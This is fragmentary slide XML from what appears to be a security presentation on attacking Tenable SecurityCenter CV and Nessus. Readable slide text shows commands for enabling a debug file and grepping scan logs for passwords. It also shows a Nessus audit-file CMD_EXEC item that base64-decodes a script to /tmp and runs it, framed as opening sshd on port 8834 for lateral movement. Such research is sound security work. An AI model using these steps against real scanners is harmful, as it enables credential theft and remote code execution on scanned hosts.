            <a:ext cx="488862" cy="31147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655" y="3486361"/>
            <a:ext cx="383231" cy="37024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698" y="1869005"/>
            <a:ext cx="619808" cy="39490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805" y="2822984"/>
            <a:ext cx="613463" cy="3908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136" y="3190850"/>
            <a:ext cx="438264" cy="32715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600" y="3532723"/>
            <a:ext cx="678239" cy="32387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412" y="3862874"/>
            <a:ext cx="613463" cy="39086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188" y="2426753"/>
            <a:ext cx="595789" cy="28450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2485" y="3976945"/>
            <a:ext cx="442107" cy="33002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025" y="3907703"/>
            <a:ext cx="613463" cy="39086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6062" y="2866579"/>
            <a:ext cx="442107" cy="33002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9083" y="2879375"/>
            <a:ext cx="488862" cy="31147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1957" y="3277763"/>
            <a:ext cx="364014" cy="28256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0583" y="1414173"/>
            <a:ext cx="340217" cy="26409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3289" y="2411400"/>
            <a:ext cx="340217" cy="26409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5877" y="2447163"/>
            <a:ext cx="340217" cy="26409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6225" y="3908821"/>
            <a:ext cx="285175" cy="249077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Explosion: 8 Points 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5987370" y="1334685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Explosion: 8 Points 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052676" y="2348479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Explosion: 8 Points 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7933191" y="2349081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Explosion: 8 Points 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5600737" y="3196753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Explosion: 8 Points 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6284135" y="3855123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Explosion: 8 Points 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224523" y="2565802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Explosion: 8 Points 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211552" y="1598109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Explosion: 8 Points 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177924" y="3526511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Explosion: 8 Points 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355492" y="1648094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Explosion: 8 Points 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355492" y="2591627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Explosion: 8 Points 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6433331" y="3516576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Explosion: 8 Points 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691543" y="3845779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77576" y="2006868"/>
            <a:ext cx="602299" cy="339323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Explosion: 8 Points 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3773823" y="3161157"/>
            <a:ext cx="569786" cy="591280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Explosion: 8 Points 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323743" y="3475382"/>
            <a:ext cx="483128" cy="461288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Explosion: 8 Points 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900514" y="3948672"/>
            <a:ext cx="483128" cy="461288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Explosion: 8 Points 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3220136" y="3859442"/>
            <a:ext cx="483128" cy="461288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Explosion: 8 Points 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294192" y="3450699"/>
            <a:ext cx="483128" cy="461288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Explosion: 8 Points 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038124" y="2371168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Explosion: 8 Points 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7168778" y="2851707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Explosion: 8 Points 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7873227" y="2866579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Explosion: 8 Points 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240768" y="3170214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Explosion: 8 Points 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819088" y="2793622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Explosion: 8 Points 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5797903" y="1846924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Explosion: 8 Points 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591363" y="2148114"/>
            <a:ext cx="476136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3124" y="751739"/>
            <a:ext cx="805940" cy="289017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Explosion: 8 Points 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880614" y="706796"/>
            <a:ext cx="935110" cy="378901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5000" y="3894572"/>
            <a:ext cx="515362" cy="400052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Explosion: 8 Points 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4417199" y="3859442"/>
            <a:ext cx="483128" cy="461288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80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8" grpId="0" animBg="1"/>
      <p:bldP spid="1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Right 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18414108">
            <a:off x="3102163" y="1958842"/>
            <a:ext cx="868970" cy="512617"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60155"/>
              <a:gd name="adj2" fmla="val 49857"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F52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40067" y="378366"/>
            <a:ext cx="3318423" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Improved Security of SecurityCenter CV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22884766"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="851150" y="798645"/>
          <a:ext cx="8064250" cy="383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4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DB17D-AD07-4BBC-A591-1717B0EDF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D6CDB17D-AD07-4BBC-A591-1717B0EDF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D6CDB17D-AD07-4BBC-A591-1717B0EDF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D6CDB17D-AD07-4BBC-A591-1717B0EDF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9D614E-5E85-47D8-B881-0AD9D9DA9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879D614E-5E85-47D8-B881-0AD9D9DA9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879D614E-5E85-47D8-B881-0AD9D9DA9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879D614E-5E85-47D8-B881-0AD9D9DA9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F60A4-1506-4F69-BD21-651D83B45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6C4F60A4-1506-4F69-BD21-651D83B45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6C4F60A4-1506-4F69-BD21-651D83B45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6C4F60A4-1506-4F69-BD21-651D83B45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75E032-E225-497E-9E51-2C461A25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4275E032-E225-497E-9E51-2C461A25B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4275E032-E225-497E-9E51-2C461A25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4275E032-E225-497E-9E51-2C461A25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0659BB-28A1-4AEF-8D1D-27EBF145B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F70659BB-28A1-4AEF-8D1D-27EBF145B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F70659BB-28A1-4AEF-8D1D-27EBF145B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F70659BB-28A1-4AEF-8D1D-27EBF145B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453135-6B25-4019-AE05-8D7A2135C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42453135-6B25-4019-AE05-8D7A2135C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42453135-6B25-4019-AE05-8D7A2135C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42453135-6B25-4019-AE05-8D7A2135C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DD0E9A-326B-41B2-9201-BB7C5A732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53DD0E9A-326B-41B2-9201-BB7C5A732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53DD0E9A-326B-41B2-9201-BB7C5A732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53DD0E9A-326B-41B2-9201-BB7C5A732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animBg="1"/>
      <p:bldGraphic spid="7" grpId="0" uiExpand="1">
        <p:bldSub>
          <a:bldDgm bld="one" rev="1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720000" y="878503"/>
            <a:ext cx="7687986" cy="356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Custom Log Files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8801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Built-in Debug Files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9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630000" y="869556"/>
            <a:ext cx="6941706" cy="3737079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>find /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/ -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>iname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> -exec grep "$root/admin/debug.*" {} \;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09" y="1186859"/>
            <a:ext cx="6674129" cy="326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1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Preparations</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630000" y="933882"/>
            <a:ext cx="6941706" cy="3737079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>debug.scan</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p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659" y="1301894"/>
            <a:ext cx="4772025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4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Analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>debug.scan</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630000" y="933882"/>
            <a:ext cx="6941706" cy="3737079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/logs/scan.[jobID].log | grep pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO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" y="1473343"/>
            <a:ext cx="75247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779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Lateral Movement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420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Point DMZ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Plassholder for lysbildenummer 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="4765664"/>
            <a:ext cx="180000" cy="9233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defRPr sz="600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="698898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6E8B7-50FC-48D4-B5AD-275A23A4E856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40" name="Content Placeholder 6"/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1344168" y="378366"/>
            <a:ext cx="7114032" cy="4118980"/>
          </a:xfr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655" y="3486361"/>
            <a:ext cx="383231" cy="3702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698" y="1869005"/>
            <a:ext cx="619808" cy="39490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805" y="2822984"/>
            <a:ext cx="613463" cy="3908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136" y="3190850"/>
            <a:ext cx="438264" cy="32715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600" y="3532723"/>
            <a:ext cx="678239" cy="32387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412" y="3862874"/>
            <a:ext cx="613463" cy="3908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188" y="2426753"/>
            <a:ext cx="595789" cy="28450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502" y="3981782"/>
            <a:ext cx="442107" cy="33002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572" y="3973574"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="33002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9083" y="2879375"/>
            <a:ext cx="488862" cy="3114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77576" y="2006868"/>
            <a:ext cx="602299" cy="3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1.85185E-6 L 0.12882 1.85185E-6 C 0.15746 0.00586 0.17378 0.00062 0.18351 0.02778 C 0.19271 0.05525 0.18177 0.11666 0.18472 0.16327 C 0.1875 0.20895 0.18472 0.25555 0.18507 0.28426 C 0.18472 0.31018 0.25781 0.30092 0.25781 0.32654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68" y="378366"/>
            <a:ext cx="4539932" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Audit File</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/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533912" y="1271655"/>
            <a:ext cx="8076176" cy="25391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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>check_type:"Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custom_item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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 system	 : "Linux"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 type		 : CMD_EXEC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 description	 : "Enable SSH on port 8834"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		 : "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -d &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> +x /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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 timeout	 : "10"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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custom_item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>check_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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" y="466344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900" dirty="0"/>
              <a:t>More Information: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Compliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Checks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Reference</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO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119019" y="2644587"/>
            <a:ext cx="793726" cy="2139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‘payload’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28B7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28B7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40068" y="378366"/>
            <a:ext cx="3193732" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What is SecurityCenter CV?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540000" y="813274"/>
            <a:ext cx="8020171" cy="3613253"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="466344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900" dirty="0"/>
              <a:t>Source: https://www.softcart.co.il/en/tenable-securitycenter-continuous-view</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="697696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67" y="378366"/>
            <a:ext cx="5628504" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Restrictions</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/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79" y="1244340"/>
            <a:ext cx="6859021" cy="274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10343" y="3283528"/>
            <a:ext cx="6139543" cy="554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327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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4432791" y="734167"/>
            <a:ext cx="3521745" cy="3791414"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6EBE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2738" y="240078"/>
            <a:ext cx="6267133" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Bypassing Restrictions  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56" y="1873381"/>
            <a:ext cx="1049171" cy="1013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3756" y="2926693"/>
            <a:ext cx="1522301" cy="11816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4236" y="979845"/>
            <a:ext cx="1251821" cy="797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4179" y="2120967"/>
            <a:ext cx="866758" cy="836870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Connector: Curved 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1927727" y="1378640"/>
            <a:ext cx="3736509" cy="1282384"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74472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35951" y="2499889"/>
            <a:ext cx="1395932" cy="23789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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0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Nessus: TCP 8834 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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1927727" y="2073826"/>
            <a:ext cx="1618361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ultiplication Sign 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515168" y="1864033"/>
            <a:ext cx="458794" cy="419586"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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TextBox 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135951" y="1954079"/>
            <a:ext cx="993098" cy="23789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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0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SSH: TCP 22 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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15110" y="4198037"/>
            <a:ext cx="1192090" cy="23789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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0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Restricted Zone</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline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Arc 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6284824" y="1659900"/>
            <a:ext cx="407491" cy="1608299"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16810126"/>
              <a:gd name="adj2" fmla="val 4707170"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="381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Arc 73"/>
